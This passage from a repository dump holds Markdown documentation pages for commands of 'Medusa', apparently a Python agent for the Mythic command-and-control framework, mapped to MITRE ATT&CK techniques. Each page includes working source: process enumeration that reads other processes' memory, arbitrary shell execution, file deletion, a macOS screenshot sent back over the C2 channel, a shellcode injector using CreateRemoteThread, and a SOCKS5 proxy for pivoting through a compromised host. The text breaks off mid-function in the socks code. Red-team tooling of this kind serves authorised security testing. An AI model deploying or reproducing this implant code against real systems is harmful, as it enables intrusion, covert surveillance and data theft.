    "content": "+++\ntitle = \"ps\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the ctypes library to interface with Windows API to enumerate process IDs and return a limited (marginally better opsec) process list.\n\n- Python Versions Supported: 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nps\n```\n\n## MITRE ATT&CK Mapping\n\n- T1057  \n\n## Detailed Summary\nThis function will only return PID, process name, architecture and binary path. Further details can be pulled back with `ps_full`.\n\n```Python\n    def ps(self, task_id):\n        import sys, os.path, ctypes, ctypes.wintypes, re\n        from ctypes import create_unicode_buffer, GetLastError\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n\n        PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n        ULONG_PTR = ctypes.wintypes.LPVOID\n        SIZE_T = ctypes.c_size_t\n        NTSTATUS = ctypes.wintypes.LONG\n        PVOID = ctypes.wintypes.LPVOID\n        PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n        Psapi = ctypes.WinDLL('Psapi.dll')\n        EnumProcesses = Psapi.EnumProcesses\n        EnumProcesses.restype = ctypes.wintypes.BOOL\n        GetProcessImageFileName = Psapi.GetProcessImageFileNameA\n        GetProcessImageFileName.restype = ctypes.wintypes.DWORD\n\n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n        IsWow64Process = Kernel32.IsWow64Process\n\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7\n\n        MAX_PATH = 260\n        PROCESS_TERMINATE = 0x0001\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        TOKEN_QUERY = 0x0008\n        TOKEN_READ = 0x00020008\n        TOKEN_IMPERSONATE = 0x00000004\n        TOKEN_QUERY_SOURCE = 0x0010\n        TOKEN_DUPLICATE = 0x0002\n        TOKEN_ASSIGN_PRIMARY = 0x0001 \n\n        ProcessBasicInformation   = 0\n        ProcessDebugPort          = 7\n        ProcessWow64Information   = 26\n        ProcessImageFileName      = 27\n        ProcessBreakOnTermination = 29\n\n        STATUS_UNSUCCESSFUL         = NTSTATUS(0xC0000001)\n        STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n        STATUS_INVALID_HANDLE       = NTSTATUS(0xC0000008).value\n        STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n        def query_dos_device(drive_letter):\n            chars = 1024\n            drive_letter = drive_letter\n            p = create_unicode_buffer(chars)\n            if 0 == Kernel32.QueryDosDeviceW(drive_letter, p, chars):\n                pass\n            return p.value\n\n        def create_drive_mapping():\n            mappings = {}\n            for letter in (chr(l) for l in range(ord('C'), ord('Z')+1)):\n                try:\n                    letter = u'%s:' % letter\n                    mapped = query_dos_device(letter)\n                    mappings[mapped] = letter\n                except WindowsError: pass\n            return mappings\n\n        mappings = create_drive_mapping()\n\n        def normalise_binpath(path):\n            match = re.match(r'(^\\\\Device\\\\[a-zA-Z0-9]+)(\\\\.*)?$', path)\n            if not match:\n                return f\"Cannot convert {path} into a Win32 compatible path\"\n            if not match.group(1) in mappings:\n                return None\n            drive = mappings[match.group(1)]\n            if not drive or not match.group(2):\n                return drive\n            return drive + match.group(2)\n\n        processes = []\n\n        count = 32\n        while True:\n            ProcessIds = (ctypes.wintypes.DWORD*count)()\n            cb = ctypes.sizeof(ProcessIds)\n            BytesReturned = ctypes.wintypes.DWORD()\n            if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)):\n                if BytesReturned.value<cb:\n                    break\n                else:\n                    count *= 2\n            else:\n                sys.exit(\"Call to EnumProcesses failed\")\n\n        for index in range(int(BytesReturned.value / ctypes.sizeof(ctypes.wintypes.DWORD))):\n            process = {}\n            process[\"process_id\"] = ProcessId = ProcessIds[index]\n            if ProcessId == 0: continue\n\n            hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, False, ProcessId)\n            if hProcess:\n                ImageFileName = (ctypes.c_char*MAX_PATH)()\n                Is64Bit = ctypes.c_int32()\n                IsWow64Process(hProcess, ctypes.byref(Is64Bit))\n                arch = \"x86\" if Is64Bit.value else \"x64\"\n                process[\"architecture\"] = arch\n\n\n                if GetProcessImageFileName(hProcess, ImageFileName, MAX_PATH)>0:\n                    filename = os.path.basename(ImageFileName.value)\n                    process[\"name\"] = filename.decode()\n                    process[\"bin_path\"] = normalise_binpath(ImageFileName.value.decode())\n                    \n                CloseHandle(hProcess)\n            processes.append(process)\n\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"processes\"] = processes\n        return { \"processes\": processes }\n\n```\n\nThis output is turned into a sortable table via a browserscript."
  },
  {
    "path": "documentation-payload/medusa/commands/ps_full.md",
    "content": "+++\ntitle = \"ps_full\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the ctypes library to interface with Windows API to enumerate process IDs and return a full process list.\n\n- Python Versions Supported: 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nps_full\n```\n\n## MITRE ATT&CK Mapping\n\n- T1057  \n\n## Detailed Summary\nIn addition to what is returned with `ps`, this function returns the PPID, integrity level and command line parameters.\n\n```Python\n    def ps_full(self, task_id):\n        import sys, os.path, ctypes, ctypes.wintypes\n        from ctypes import create_unicode_buffer, GetLastError\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n\n        PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n        ULONG_PTR = ctypes.wintypes.LPVOID\n        SIZE_T = ctypes.c_size_t\n        NTSTATUS = ctypes.wintypes.LONG\n        PVOID = ctypes.wintypes.LPVOID\n        PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n        Psapi = ctypes.WinDLL('Psapi.dll')\n        EnumProcesses = Psapi.EnumProcesses\n        EnumProcesses.restype = ctypes.wintypes.BOOL\n\n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n        IsWow64Process = Kernel32.IsWow64Process\n\n        GetCurrentProcess = Kernel32.GetCurrentProcess\n        GetCurrentProcess.restype = ctypes.wintypes.HANDLE\n        GetCurrentProcess.argtypes = ()\n\n        ReadProcessMemory = Kernel32.ReadProcessMemory\n        ReadProcessMemory.errcheck = _check_bool\n        ReadProcessMemory.argtypes = (\n            ctypes.wintypes.HANDLE, \n            ctypes.wintypes.LPCVOID,\n            ctypes.wintypes.LPVOID, \n            SIZE_T,           \n            ctypes.POINTER(SIZE_T))\n\n        PROCESS_VM_READ           = 0x0010\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        MAX_PATH = 260\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ProcessBasicInformation   = 0\n        ProcessDebugPort          = 7\n        ProcessWow64Information   = 26\n        ProcessImageFileName      = 27\n        ProcessBreakOnTermination = 29\n\n        STATUS_UNSUCCESSFUL         = NTSTATUS(0xC0000001)\n        STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n        STATUS_INVALID_HANDLE       = NTSTATUS(0xC0000008).value\n        STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n\n        class RemotePointer(ctypes._Pointer):\n            def __getitem__(self, key):\n                size = None\n                if not isinstance(key, tuple):\n                    raise KeyError('must be (index, handle[, size])')\n                if len(key) > 2:\n                    index, handle, size = key\n                else:\n                    index, handle = key\n                if isinstance(index, slice):\n                    raise TypeError('slicing is not supported')\n                dtype = self._type_\n                offset = ctypes.sizeof(dtype) * index\n                address = PVOID.from_buffer(self).value + offset\n                simple = issubclass(dtype, ctypes._SimpleCData)\n                if simple and size is not None:\n                    if dtype._type_ == ctypes.wintypes.WCHAR._type_:\n                        buf = (ctypes.wintypes.WCHAR * (size // 2))()\n                    else: buf = (ctypes.c_char * size)()\n                else: buf = dtype()\n                nread = SIZE_T()\n                Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), \\\n                        ctypes.sizeof(buf), ctypes.byref(nread))\n                if simple: return buf.value\n                return buf\n\n        _remote_pointer_cache = {}\n        def RPOINTER(dtype):\n            if dtype in _remote_pointer_cache: return _remote_pointer_cache[dtype]\n            name = 'RP_%s' % dtype.__name__\n            ptype = type(name, (RemotePointer,), {'_type_': dtype})\n            _remote_pointer_cache[dtype] = ptype\n            return ptype\n\n        RPWSTR = RPOINTER(ctypes.wintypes.WCHAR)\n\n        class UNICODE_STRING(ctypes.Structure):\n            _fields_ = (('Length',        ctypes.wintypes.USHORT),\n                        ('MaximumLength', ctypes.wintypes.USHORT),\n                        ('Buffer',        RPWSTR))\n\n        class LIST_ENTRY(ctypes.Structure):\n            pass\n\n        RPLIST_ENTRY = RPOINTER(LIST_ENTRY)\n\n        LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY),\n                            ('Blink', RPLIST_ENTRY))\n\n        class PEB_LDR_DATA(ctypes.Structure):\n            _fields_ = (('Reserved1',               ctypes.wintypes.BYTE * 8),\n                        ('Reserved2',               PVOID * 3),\n                        ('InMemoryOrderModuleList', LIST_ENTRY))\n\n        RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA)\n\n        class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure):\n            _fields_ = (('Reserved1',     ctypes.wintypes.BYTE * 16),\n                        ('Reserved2',     PVOID * 10),\n                        ('ImagePathName', UNICODE_STRING),\n                        ('CommandLine',   UNICODE_STRING))\n\n        RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS)\n        PPS_POST_PROCESS_INIT_ROUTINE = PVOID\n\n        class PEB(ctypes.Structure):\n            _fields_ = (('Reserved1',              ctypes.wintypes.BYTE * 2),\n                        ('BeingDebugged',          ctypes.wintypes.BYTE),\n                        ('Reserved2',              ctypes.wintypes.BYTE * 1),\n                        ('Reserved3',              PVOID * 2),\n                        ('Ldr',                    RPPEB_LDR_DATA),\n                        ('ProcessParameters',      RPRTL_USER_PROCESS_PARAMETERS),\n                        ('Reserved4',              ctypes.wintypes.BYTE * 104),\n                        ('Reserved5',              PVOID * 52),\n                        ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE),\n                        ('Reserved6',              ctypes.wintypes.BYTE * 128),\n                        ('Reserved7',              PVOID * 1),\n                        ('SessionId',              ctypes.wintypes.ULONG))\n\n        RPPEB = RPOINTER(PEB)\n\n        class PROCESS_BASIC_INFORMATION(ctypes.Structure):\n            _fields_ = (('Reserved1',       PVOID),\n                        ('PebBaseAddress',  RPPEB),\n                        ('Reserved2',       PVOID * 2),\n                        ('UniqueProcessId', ULONG_PTR),\n                        ('InheritedFromUniqueProcessId',       ULONG_PTR))\n\n        def NtError(status):\n            import sys\n            descr = 'NTSTATUS(%#08x) ' % (status % 2**32,)\n            if status & 0xC0000000 == 0xC0000000:\n                descr += '[Error]'\n            elif status & 0x80000000 == 0x80000000:\n                descr += '[Warning]'\n            elif status & 0x40000000 == 0x40000000:\n                descr += '[Information]'\n            else:\n                descr += '[Success]'\n            if sys.version_info[:2] < (3, 3):\n                return WindowsError(status, descr)\n            return OSError(None, descr, None, status)\n\n        ntdll = ctypes.WinDLL('ntdll.dll')\n        NtQueryInformationProcess = ntdll.NtQueryInformationProcess\n        NtQueryInformationProcess.restype = NTSTATUS\n        NtQueryInformationProcess.argtypes = (\n            ctypes.wintypes.HANDLE,\n            PROCESSINFOCLASS, \n            PVOID,            \n            ctypes.wintypes.ULONG,\n            PULONG)        \n\n        class ProcessInformation(object):\n            _close_handle = False\n            _closed = False\n            _module_names = None\n\n            def __init__(self, process_id=None, handle=None):\n                if process_id is None and handle is None:\n                    handle = GetCurrentProcess()\n                elif handle is None:\n                    handle = OpenProcess(PROCESS_VM_READ | \n                                            PROCESS_QUERY_INFORMATION,\n                                                False, process_id)\n                    self._close_handle = True\n                self._handle = handle\n                if not self._query_info() or (process_id is not None \\\n                    and self._process_id != process_id):\n                    return\n\n            def __del__(self, CloseHandle=CloseHandle):\n                if self._close_handle and not self._closed:\n                    try:\n                        CloseHandle(self._handle)\n                    except WindowsError as e: pass\n                    self._closed = True\n\n            def _query_info(self):\n                info = PROCESS_BASIC_INFORMATION()\n                handle = self._handle\n                status = NtQueryInformationProcess(handle, ProcessBasicInformation,\n                            ctypes.byref(info), ctypes.sizeof(info), None)\n                if status < 0:\n                    return False\n\n                self._process_id = info.UniqueProcessId\n                self._parent_process_id = info.InheritedFromUniqueProcessId\n                self._peb = peb = info.PebBaseAddress[0, handle]\n                self._params = peb.ProcessParameters[0, handle]\n\n                Is64Bit = ctypes.c_int32()\n                IsWow64Process(handle, ctypes.byref(Is64Bit))\n                self._arch = \"x86\" if Is64Bit.value else \"x64\"\n\n            @property\n            def process_id(self):\n                return self._process_id\n\n            @property\n            def session_id(self):\n                return self._peb.SessionId\n\n            @property\n            def image_path(self):\n                ustr = self._params.ImagePathName\n                return ustr.Buffer[0, self._handle, ustr.Length]\n\n            @property\n            def command_line(self):\n                ustr = self._params.CommandLine\n                buf = ustr.Buffer[0, self._handle, ustr.Length]\n                return buf\n\n        processes = []\n\n        count = 32\n        while True:\n            ProcessIds = (ctypes.wintypes.DWORD*count)()\n            cb = ctypes.sizeof(ProcessIds)\n            BytesReturned = ctypes.wintypes.DWORD()\n            if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)):\n                if BytesReturned.value<cb:\n                    break\n                else:\n                    count *= 2\n            else:\n                sys.exit(\"Call to EnumProcesses failed\")\n\n        for index in range(int(BytesReturned.value / ctypes.sizeof(ctypes.wintypes.DWORD))):\n            process = {}\n            process[\"process_id\"] = ProcessId = ProcessIds[index]\n            if ProcessId == 0: continue\n\n            try:\n                pi = ProcessInformation(ProcessId)\n                process[\"name\"] = os.path.basename(pi.image_path)\n                process[\"architecture\"] = str(pi._arch)\n                process[\"bin_path\"] = pi.image_path\n                process[\"integrity_level\"] = pi.session_id\n                process[\"parent_process_id\"] = pi._parent_process_id\n                process[\"command_line\"] = pi.command_line\n            except:\n                pass\n            processes.append(process)\n\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"processes\"] = processes\n        return { \"processes\": processes }\n\n```\n\nThis output is turned into a sortable table via a browserscript."
  },
  {
    "path": "documentation-payload/medusa/commands/rm.md",
    "content": "+++\ntitle = \"rm\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nRemove a file or directory, no quotes are necessary and relative paths are fine \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### path\n\n- Description: Path to file or folder to remove  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nrm ../path/to/file_or_folder\n```\n\n## MITRE ATT&CK Mapping\n\n- T1106  \n- T1107  \n\n## Detailed Summary\nUses Python `os` library functions to remove the file or folder specified:\n```Python\n    def rm(self, task_id, path):\n        import shutil\n        file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        if os.path.isdir(file_path):\n            shutil.rmtree(file_path)\n        else:\n            os.remove(file_path)\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/screenshot.md",
    "content": "+++\ntitle = \"screenshot\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nUse the built-in CGDisplay API calls to capture the display and send it back over the C2 channel. \n\n- Python Versions Supported: 2.7\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n## Usage\n\n```\nscreenshot\n```\n\n## MITRE ATT&CK Mapping\n\n- T1113  \n\n## Detailed Summary\n\nThis uses API calls to read the current screen the return it to Mythic. This doesn't currently capture _all_ screens though.\n\n```Python\n    def screenshot(self, task_id):\n        from Cocoa import NSURL, NSBitmapImageRep\n        import LaunchServices\n        import Quartz\n        import Quartz.CoreGraphics as CG\n        region = CG.CGRectInfinite\n        image = CG.CGWindowListCreateImage(region, CG.kCGWindowListOptionOnScreenOnly, CG.kCGNullWindowID, CG.kCGWindowImageDefault)\n        sh_data = CG.CFDataCreateMutable(None, 0)\n        dest = Quartz.CGImageDestinationCreateWithData(sh_data, LaunchServices.kUTTypePNG, 1, None)\n        file_size = 0\n        if(dest):\n            Quartz.CGImageDestinationAddImage (dest, image, 0)\n            if (Quartz.CGImageDestinationFinalize(dest)):\n                file_size = CG.CFDataGetLength(sh_data)\n\n        if(file_size) > 0:\n            total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)\n            data = {\n                \"action\": \"post_response\", \n                \"responses\": [\n                {\n                    \"task_id\": task_id,\n                    \"total_chunks\": total_chunks,\n                    \"file_path\": str(datetime.now()),\n                    \"chunk_size\": CHUNK_SIZE,\n                    \"is_screenshot\": True \n                }]\n            }\n            initial_response = self.postMessageAndRetrieveResponse(data)\n            for i in range(0,total_chunks):\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                if i == total_chunks:\n                    content = sh_data[i*CHUNK_SIZE:]\n                else:\n                    content = sh_data[i*CHUNK_SIZE:(i+1)*CHUNK_SIZE]\n                data = {\n                    \"action\": \"post_response\", \n                    \"responses\": [\n                        {\n                            \"chunk_num\": i+1,\n                            \"file_id\": initial_response[\"responses\"][0][\"file_id\"],\n                            \"chunk_data\": base64.b64encode(content),\n                            \"task_id\": task_id                        \n                        }\n                    ]\n                }\n                response = self.postMessageAndRetrieveResponse(data)\n\n```\n\nThe screencapture is chunked and sent back to Mythic.\n\n>**NOTE** With 10.15, there are protections against this, so be careful\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/shell.md",
    "content": "+++\ntitle = \"shell\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis runs {command} in a terminal by leveraging the `subprocess` Python library.\n     \n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### command\n\n- Description: Command to run  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nshell {command}\n```\n\n## MITRE ATT&CK Mapping\n\n- T1059  \n\n## Detailed Summary\n\nIn the event that stderr has content, this will be returned by the function, providing the operator with details of issues encountered.\n\n```Python\n    def shell(self, task_id, command):\n        import subprocess\n        process = subprocess.Popen(command.split(),\n                     stdout=subprocess.PIPE, \n                     stderr=subprocess.PIPE,\n                     cwd=self.current_directory)\n        stdout, stderr = process.communicate()\n        out = stderr if stderr else stdout\n        return out.decode()\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/shinject.md",
    "content": "+++\ntitle = \"shinject\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis takes shellcode and injects it into a target process by ID.\n     \n{{% notice warning %}}\nMake sure you match the architecture of your shellcode and target process.\n{{% /notice %}}\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### shellcode\n\n- Description: File upload of shellcode to inject\n- Required Value: True  \n- Default Value: None  \n\n#### process id\n\n- Description: ID of process to inject shellcode into\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nshinject\n```\n\n## MITRE ATT&CK Mapping\n\n- T1059  \n\n## Detailed Summary\n\nThis makes use of the `ctypes` library once more, to perform the OpenProcess -> VirtualAllocex -> WriteProcessMemory -> CreateRemoteThread injection technique.\n\n\n\n```Python\n    def shinject(self, task_id, shellcode, pid):\n        from ctypes import windll,c_int,byref,c_ulong\n        total_chunks = 1\n        chunk_num = 0\n        sc = b\"\"\n        while (chunk_num < total_chunks):\n            data = { \n                \"action\": \"post_response\", \"responses\": [{\n                    \"upload\": { \"chunk_size\": 51200, \"file_id\": shellcode, \"chunk_num\": chunk_num },\n                    \"task_id\": task_id\n                }] \n            }\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            sc+=base64.b64decode(chunk[\"chunk_data\"])\n\n        PAGE_EXECUTE_READWRITE = 0x00000040\n        PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )\n        VIRTUAL_MEM  = ( 0x1000 | 0x2000 )\n\n        kernel32 = windll.kernel32\n        code_size = len(sc)\n        h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))\n\n        if not h_process:\n            return \"Error: Couldn't acquire a handle to PID {}\".format(pid)\n        arg_address = kernel32.VirtualAllocEx(h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)\n        written = c_int(0)\n        kernel32.WriteProcessMemory(h_process, arg_address, sc, code_size, byref(written))\n        thread_id = c_ulong(0)\n        if not kernel32.CreateRemoteThread(h_process, None, 0, arg_address, None, 0, byref(thread_id)):\n            return \"[*] Failed to inject process-killing shellcode. Exiting.\"\n        return \"[*] Remote thread created.\"\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/sleep.md",
    "content": "+++\ntitle = \"sleep\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nModify the time between callbacks in seconds. \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### jitter\n\n- Description: Percentage of C2's interval to use as jitter   \n- Required Value: False  \n- Default Value: None  \n\n#### seconds\n\n- Description: Number of seconds between checkins   \n- Required Value: False  \n- Default Value: None  \n\n## Usage\n### Without Popup\n\n```\nsleep [seconds] [jitter]\n```\n\n## MITRE ATT&CK Mapping\n\n- T1029  \n\n## Detailed Summary\n\nInternally modifies the sleep interval and sleep jitter percentages when doing callbacks:\n\n```Python\n    def sleep(self, task_id, seconds, jitter=-1):\n        self.agent_config[\"Sleep\"] = int(seconds)\n        if jitter != -1:\n            self.agent_config[\"Jitter\"] = int(jitter)\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/socks.md",
    "content": "+++\ntitle = \"socks\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis establishes a SOCKS5 proxy through the Medusa agent, permitting tooling to be proxied through the compromised host.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### action\n\n- Description: start/stop the proxy\n- Required Value: True  \n- Default Value: None  \n\n#### port\n\n- Description: The port on the Mythic server to open for SOCKS traffic\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nsocks start/stop port_no\n```\n\n## MITRE ATT&CK Mapping\n\n- T1090  \n\n## Detailed Summary\n\nNote that thiss function has changeable sleep intervals and queue timeouts, you might want to tune these if you experience sluggish comms or high-cpu usage.\n\nPython 2.7:\n\n```Python\n    def socks(self, task_id, action, port):\n        import socket, select\n        from threading import Thread, activeCount\n        from struct import pack, unpack\n        from Queue import Queue \n        \n        MAX_THREADS = 200\n        BUFSIZE = 2048\n        TIMEOUT_SOCKET = 5\n        OUTGOING_INTERFACE = \"\"\n\n        VER = b'\\x05'\n        M_NOAUTH = b'\\x00'\n        M_NOTAVAILABLE = b'\\xff'\n        CMD_CONNECT = b'\\x01'\n        ATYP_IPV4 = b'\\x01'\n        ATYP_DOMAINNAME = b'\\x03'\n\n        SOCKS_SLEEP_INTERVAL = 0.1\n        QUEUE_TIMOUT = 1\n\n        def sendSocksPacket(server_id, data, exit_value):\n            self.socks_out.put({ \"server_id\": server_id, \n                \"data\": base64.b64encode(data), \"exit\": exit_value })\n            \n        def create_socket():\n            try:\n                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                sock.settimeout(TIMEOUT_SOCKET)\n            except: return \"Failed to create socket: {}\".format(str(err))\n            return sock\n\n        def connect_to_dst(dst_addr, dst_port):\n            sock = create_socket()\n            if OUTGOING_INTERFACE:\n                try:\n                    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE)\n                except PermissionError as err: return 0\n            try:\n                sock.connect((str(dst_addr), int(dst_port)))\n                return sock\n            except socket.error as err: return 0\n\n        def request_client(msg):\n            try:\n                message = base64.b64decode(msg[\"data\"])\n                s5_request = bytearray(message[:BUFSIZE])\n            except:\n                return False\n            if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT or s5_request[2:3] != b'\\x00'):\n                return False\n            if s5_request[3:4] == ATYP_IPV4:\n                dst_addr = socket.inet_ntoa(s5_request[4:-2])\n                dst_port = unpack('>H', s5_request[8:len(s5_request)])[0]\n            elif s5_request[3:4] == ATYP_DOMAINNAME:\n                sz_domain_name = s5_request[4]\n                dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)]\n                port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)]\n                dst_port = unpack('>H', port_to_unpack)[0]\n            else: return False\n            return (dst_addr, dst_port)\n\n        def create_connection(msg):\n            dst = request_client(msg)\n            rep = b'\\x07'\n            bnd = b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00'\n            if dst: \n                socket_dst = connect_to_dst(dst[0], dst[1])\n            if not dst or socket_dst == 0: rep = b'\\x01'\n            else:\n                rep = b'\\x00'\n                bnd = socket.inet_aton(socket_dst.getsockname()[0])\n                bnd += pack(\">H\", socket_dst.getsockname()[1])\n            reply = VER + rep + b'\\x00' + ATYP_IPV4 + bnd\n            try: sendSocksPacket(msg[\"server_id\"], reply, msg[\"exit\"])                \n            except: return\n            if rep == b'\\x00': return socket_dst\n\n        def get_running_socks_thread():\n            return [ t for t in threading.enumerate() if \"socks:\" in t.name and not task_id in t.name ]\n\n        def a2m(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys(): return\n                try: reader, _, _ = select.select([socket_dst], [], [], 1)\n                except select.error as err: return\n\n                if not reader: continue\n                try:\n                    for sock in reader:\n                        data = sock.recv(BUFSIZE)\n                        if not data:\n                            sendSocksPacket(server_id, b\"\", True)\n                            socket_dst.close()\n                            return\n                        sendSocksPacket(server_id, data, False)\n                except Exception as e: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        def m2a(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys():\n                    socket_dst.close()\n                    return\n                try:\n                    if not self.socks_open[server_id].empty():\n                        socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT)))\n                except: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        t_socks = get_running_socks_thread()\n\n        if action == \"start\":\n            if len(t_socks) > 0: return \"[!] SOCKS Proxy already running.\"\n            self.sendTaskOutputUpdate(task_id, \"[*] SOCKS Proxy started.\")\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"[*] SOCKS Proxy stopped.\"\n                if not self.socks_in.empty():\n                    packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT)\n                    if packet_json:\n                        server_id = packet_json[\"server_id\"]\n                        if server_id in self.socks_open.keys():\n                            if packet_json[\"data\"]: \n                                self.socks_open[server_id].put(packet_json[\"data\"])\n                            elif packet_json[\"exit\"]:\n                                self.socks_open.pop(server_id)\n                        else:\n                            if not packet_json[\"exit\"]:    \n                                if activeCount() > MAX_THREADS:\n                                    sleep(3)\n                                    continue\n                                self.socks_open[server_id] = Queue()\n                                sock = create_connection(packet_json)\n                                if sock:\n                                    send_thread = Thread(target=a2m, args=(server_id, sock, ), name=\"A2M:{}\".format(server_id))\n                                    recv_thread = Thread(target=m2a, args=(server_id, sock, ), name=\"M2A:{}\".format(server_id))\n                                    send_thread.start()\n                                    recv_thread.start()\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n        else:\n            if len(t_socks) > 0:\n                for t_sock in t_socks:\n                    task = [task for task in self.taskings if task[\"task_id\"] == t_sock.name.split(\":\")[1]][0]\n                    task[\"stopped\"] = task[\"completed\"] = True\n                self.socks_open = {}\n\n```\n\nPython 3.8:\n\n```Python\n    def socks(self, task_id, action, port):\n        import socket, select, queue\n        from threading import Thread, activeCount\n        from struct import pack, unpack\n        \n        MAX_THREADS = 200\n        BUFSIZE = 2048\n        TIMEOUT_SOCKET = 5\n        OUTGOING_INTERFACE = \"\"\n\n        VER = b'\\x05'\n        M_NOAUTH = b'\\x00'\n        M_NOTAVAILABLE = b'\\xff'\n        CMD_CONNECT = b'\\x01'\n        ATYP_IPV4 = b'\\x01'\n        ATYP_DOMAINNAME = b'\\x03'\n\n        SOCKS_SLEEP_INTERVAL = 0.1\n        QUEUE_TIMOUT = 1\n\n        def sendSocksPacket(server_id, data, exit_value):\n            self.socks_out.put({ \"server_id\": server_id, \n                \"data\": base64.b64encode(data).decode(), \"exit\": exit_value })\n            \n        def create_socket():\n            try:\n                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                sock.settimeout(TIMEOUT_SOCKET)\n            except: return \"Failed to create socket: {}\".format(str(err))\n            return 